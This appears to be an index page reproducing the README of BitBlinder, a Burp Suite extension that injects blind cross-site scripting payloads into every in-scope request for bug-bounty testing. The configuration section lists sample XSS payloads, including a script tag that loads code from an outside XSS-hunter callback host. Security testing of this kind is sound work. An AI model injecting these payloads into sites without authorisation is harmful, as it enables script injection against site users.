Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/BitTheByte/BitBlinder

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities
https://github.com/BitTheByte/BitBlinder

burp-extensions burp-plugin burpsuite burpsuite-extender jython python

Last synced: about 14 hours ago
JSON representation

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities

Host: GitHub
URL: https://github.com/BitTheByte/BitBlinder
Owner: BitTheByte
Created: 2019-01-28T20:45:39.000Z (almost 6 years ago)
Default Branch: master
Last Pushed: 2023-06-04T18:55:35.000Z (over 1 year ago)
Last Synced: 2024-08-01T10:17:15.898Z (3 months ago)
Topics: burp-extensions, burp-plugin, burpsuite, burpsuite-extender, jython, python
Language: Python
Homepage:
Size: 12.7 KB
Stars: 107
Watchers: 5
Forks: 23
Open Issues: 3
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-bugbounty-tools - BitBlinder - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities (Exploitation / XSS Injection)
awesome-burp-extensions - BitBlinder - Burp extension helps in finding blind xss vulnerabilities (Vulnerability Specific Extensions / Cross-site scripting)
awesome-hacking-lists - BitTheByte/BitBlinder - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities (Python)

README

        # BitBlinder

**THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK**  

Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite

```

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

-  Developer: Ahmed Ezzat (BitTheByte)      -

-  Github:    https://github.com/BitTheByte -

-  Version:   0.05b                         -

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE

[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY

[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH

```

# Configuration

Go to `Bit blinder` tab then enable it  

Set your payloads (line separated)  

```

"><script>

"><script%20src="https://myusername.xss.ht"><script>

...

```

If you added more than 1 payload enable the randomization button  

If you want to keep it disabled keep in mind that the tool will use the first payload only

# How to use

1. Load the extension to your burpsuite

2. Click on `Bit blinder` tab then enable it  

3. Add your target to scope **It'll only work for inscope items**

4. Continue your hunting session **Make sure to do alot of actions [Forms,Search,...]**

5. Monitor the output in extension's output tab

**Note:** By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection

# In a nutshell

When user visits [https://example.com?vuln=123&vuln2=abc](https://example.com?vuln=123&vuln2=abc)  

This tool will generate the following 2 requests (in the background without effecting the current session)  

1. [https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc](https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc)

2. [https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]](https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD])

The previous example also applies to `POST` parameters

# Current version

```

Version 0.05b

```

# TO-DO (By priority)

- GUI ✓ ( A very ugly one for now.. )

- Fix endless request loops ✓

- Injection in headers

- Option to exclude paramters/hosts/endpoints

- Better output/logging system